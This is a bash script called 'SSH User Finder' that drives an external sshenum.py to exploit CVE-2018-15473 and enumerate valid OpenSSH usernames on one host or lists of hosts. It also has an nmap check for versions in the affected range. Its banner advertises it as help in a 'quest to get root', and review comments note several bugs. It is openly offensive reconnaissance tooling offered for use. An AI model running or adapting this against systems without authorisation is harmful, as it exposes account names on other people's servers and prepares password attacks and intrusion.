suf.sh
#!/bin/bash
# Exploits CVE-2018-15473 to enumerate OpenSSH usernames
# ANSI SGR escape sequences wrapped around status messages.
RED=$'\033[01;31m'     # bold red
GREEN=$'\033[00;32m'   # green
RESTORE=$'\033[0m'     # reset attributes
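# CLI mode
# With two, three or four arguments the script runs non-interactively and
# exits; with any other argument count it continues to the interactive menu.
#
#   suf.sh USER HOST                 one username against one host
#   suf.sh -u USERFILE HOST          every entry of USERFILE against one host
#   suf.sh USER -i HOSTFILE          one username against every entry of HOSTFILE
#   suf.sh <arg> USERFILE <arg> HOSTFILE
#                                    every user against every host; positions
#                                    1 and 3 are accepted unchecked, as before
#
# sshenum.py is not part of this file. Each call presumably makes one
# connection to the host's SSH port (confirm against sshenum.py), so a list
# run issues one probe per (host, user) pair.

# Loads the whitespace-separated entries of file $1 into the array SUF_LIST.
# Entries are taken literally: unlike `for x in $(cat file)`, a `*` or `?` in
# the list is not expanded against the current directory.
suf_load_list() {
  SUF_LIST=()
  # read returns non-zero at end of file; the array is still populated.
  # An unreadable file leaves SUF_LIST empty, so the caller loops zero times.
  read -r -d '' -a SUF_LIST < "$1" || true
}

# Dispatches on the argument count. Exits the script in every CLI form and
# returns 0 (falling through to the menu) otherwise.
suf_cli() {
  local user ip
  local -a users=() hosts=()

  case $# in
    2)
      python sshenum.py "$2" "$1"
      exit
      ;;
    3)
      # [[ ]] keeps an empty argument from breaking the comparison.
      if [[ $1 == "-u" ]]; then
        suf_load_list "$2"
        users=("${SUF_LIST[@]}")
        ip=$3
        for user in "${users[@]}"; do
          python sshenum.py "$ip" "$user"
        done
        exit
      elif [[ $2 == "-i" ]]; then
        user=$1
        suf_load_list "$3"
        hosts=("${SUF_LIST[@]}")
        for ip in "${hosts[@]}"; do
          echo -e "\nTarget: $ip"
          python sshenum.py "$ip" "$user"
          echo ""
        done
        exit
      else
        echo "Invalid Options"
        sleep 3
        exit 1
      fi
      ;;
    4)
      suf_load_list "$2"
      users=("${SUF_LIST[@]}")
      suf_load_list "$4"
      hosts=("${SUF_LIST[@]}")
      for ip in "${hosts[@]}"; do
        echo -e "\nTarget: $ip"
        for user in "${users[@]}"; do
          python sshenum.py "$ip" "$user"
        done
      done
      exit
      ;;
    *) ;;
  esac
}

suf_cli "$@"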
# Interactive Menu Mode
# Prints the banner, pauses, lists the two top-level options and stores the
# operator's choice in $menu for the checks that follow.
printf '%b\n' \
  "${GREEN}\nSSH User Finder v1.2${RESTORE}" \
  "${GREEN}A tool for aiding you in your quest to get root\n${RESTORE}"
sleep 2
printf '%s\n' \
  "Choose an option:" \
  "[1] Check for usernames on host" \
  "[2] Check if target is vulnerable to username checking"
read -p "suf => " menu
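# Checks if host is vulnerable
#
# Menu option 2: fingerprint the SSH service on port 22 with `nmap -sV` and
# compare the advertised OpenSSH version with the range affected by
# CVE-2018-15473 (upstream releases up to and including 7.7).
#
# The verdict is a banner heuristic, not proof. Distributions commonly
# backport the fix without changing the advertised version, so a host reported
# as "vulnerable" may already be patched. Confirm against the installed
# package's patch level before acting on the result.

# Classifies the first "OpenSSH X.Y" token found in a string.
# Arguments: $1 - text containing the banner
# Returns:   0 - upstream version is 7.7 or older (affected range)
#            1 - upstream version is newer than 7.7
#            2 - no "OpenSSH X.Y" token found
suf_openssh_is_affected() {
  local banner=$1
  local re='OpenSSH ([0-9]+)\.([0-9]+)'
  local major minor

  [[ $banner =~ $re ]] || return 2
  # 10# forces base 10 so a leading zero is not read as octal.
  major=$((10#${BASH_REMATCH[1]}))
  minor=$((10#${BASH_REMATCH[2]}))

  # Compare major and minor separately: gluing the digits together (7.7 -> 77)
  # only works while both parts are a single digit.
  if (( major < 7 || (major == 7 && minor <= 7) )); then
    return 0
  fi
  return 1
}

if [[ "${menu:-}" == "2" ]]; then
  echo -e "\nWhat is the IP of the host you want to check?"
  read -r -p "suf => " checkip

  # The value becomes a single nmap argument. Refuse input that is empty,
  # contains whitespace, or starts with '-' so it cannot be read as an option.
  if [[ -z $checkip || $checkip == -* || $checkip == *[[:space:]]* ]]; then
    echo "${RED}Error: Invalid target${RESTORE}"
    sleep 2
    exit 1
  fi

  # [0-9]+ also matches two-digit major versions such as 10.0, which the
  # single-digit pattern reported as "not running OpenSSH".
  scan=$(nmap -sV -Pn -n -p 22 "$checkip" \
    | grep -E -o -m 1 'OpenSSH [0-9]+\.[0-9]+')

  # An empty result also covers a missing nmap binary or a closed or
  # filtered port, not only a different SSH implementation.
  if [[ -z $scan ]]; then
    echo "${RED}Error: Target is not running OpenSSH${RESTORE}"
    sleep 2
    exit
  fi

  # The earlier `[ $version > "77" ]` was a redirection, not a comparison: it
  # created a file named 77 and was always true. The helper's status replaces it.
  suf_openssh_is_affected "$scan"
  case $? in
    0)
      echo "${GREEN}Target is vulnerable to exploit${RESTORE}"
      sleep 3
      exit
      ;;
    1)
      echo "${RED}Target is not vulnerable to exploit${RESTORE}"
      sleep 3
      exit
      ;;
    *)
      # As before, this branch does not exit and falls through to the prompts.
      echo "${RED}Unknown error${RESTORE}"
      sleep 3
      ;;
  esac
fi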
# Username Checker
# Two prompts select the mode: $useroption (1 = single username, 2 = list)
# and $ipoption (1 = single IP, 2 = list). The branch chain after this block
# dispatches on the pair.
printf '%b\n' "\nUse single username or username list for testing?"
printf '%s\n' "[1] Single username" "[2] Username list"
read -p "suf => " useroption

printf '%b\n' "\nTest single IP or IPs from a list?"
printf '%s\n' "[1] Single IP" "[2] IP list"
read -p "suf => " ipoption
# Dispatch on the two answers read above ($useroption, $ipoption). Each of the
# four valid combinations prompts for its inputs, echoes them back, asks for
# confirmation and then runs the external helper once per (ip, user) pair.
# Any other combination reaches the final else and exits.
#
# NOTE(review): sshenum.py is not shown here. Presumably each call makes one
# connection to the host's SSH port, so a list-by-list run issues
# len(users) x len(ips) probes. Confirm against sshenum.py.
# NOTE(review): every expansion in this chain is unquoted and every read lacks
# -r. An empty answer makes `[ $var == ... ]` a malformed test (treated as
# false), and entries pulled in with $( cat file ) are word-split and
# glob-expanded before they reach the helper.
# Choice is userfile and ipfile
if [ $useroption == "2" ] && [ $ipoption == "2" ]; then
echo "What is the path to the userlist file? (relative or full path)"
read -p "suf => " userfile
echo -e "\nWhat is the path to the IP file? (relative or full path)"
read -p "suf => " ipfile
# NOTE(review): no -e here, so bash prints the leading \n literally.
echo "\nUser list: $userfile"
echo "IP list: $ipfile"
echo -e "\nLook good? (y/n)"
read -p "suf => " confirm
if [ $confirm == "y" ] || [ $confirm == "Y" ]; then
for ip in $( cat $ipfile )
do
# Printed (in red) and followed by a 3 s pause once per IP, inside the loop.
echo $RED"Checking hosts for valid users..."$RESTORE
sleep 3
for user in $( cat $userfile )
do
python sshenum.py $ip $user
done
done
else
# Anything other than y/Y aborts the script.
exit
fi
# Choice is userfile and single ip
elif [ $useroption == "2" ] && [ $ipoption == "1" ]; then
echo "What is the path to the userlist file? (relative or full path)"
read -p "suf => " userfile
echo -e "\nWhat is the IP address of the host to check?"
read -p "suf => " ip
# NOTE(review): no -e here, so bash prints the leading \n literally.
echo "\nUser list: $userfile"
echo "IP: $ip"
echo -e "\nLook good? (y/n)"
read -p "suf => " confirm
if [ $confirm == "y" ] || [ $confirm == "Y" ]; then
echo $GREEN"Checking $ip for valid users..."$RESTORE
sleep 3
for user in $( cat $userfile )
do
python sshenum.py $ip $user
done
else
exit
fi
# Choice is single username and ipfile
elif [ $useroption == "1" ] && [ $ipoption == "2" ]; then
echo "What is the username you would like to check?"
read -p "suf => " username
echo -e "\nWhat is the path to the IP file? (full or relative path)\n"
read -p "suf => " ipfile
echo -e "\nUsername: $username"
# The label says "IP" but the value shown is the path of the IP list file.
echo "IP: $ipfile"
echo -e "\nLook good? (y/n)"
read -p "suf => " confirm
if [ $confirm == "y" ] || [ $confirm == "Y" ]; then
echo $GREEN"Checking hosts for username $username..."$RESTORE
for ip in $( cat $ipfile )
do
# NOTE(review): this call differs from the other three branches. It names
# sshenum.sh rather than sshenum.py, passes the list path $ipfile instead of
# the loop variable $ip, and passes $user, which is not assigned anywhere on
# this path (the prompt stored the name in $username).
python sshenum.sh $ipfile $user
done
else
exit
fi
# Option is single username and single ip
elif [ $useroption == "1" ] && [ $ipoption == "1" ]; then
echo "What is the username you would like to check?"
read -p "suf => " username
echo -e "\nWhat is the IP address of the host to check?"
read -p "suf => " ip
echo "Username: $username"
echo "Host IP: $ip"
echo -e "\nLook good? (y/n)\n"
read -p "suf => " confirm
if [ $confirm == "y" ] || [ $confirm == "Y" ]; then
echo $GREEN"Checking $ip for username $username..."$RESTORE
python sshenum.py $ip $username
else
exit
fi
# Invalid option selected
else
echo $RED"Invalid option(s)"$RESTORE
sleep 5
# Bare exit after sleep: the script ends with sleep's status, not an error code.
exit
fi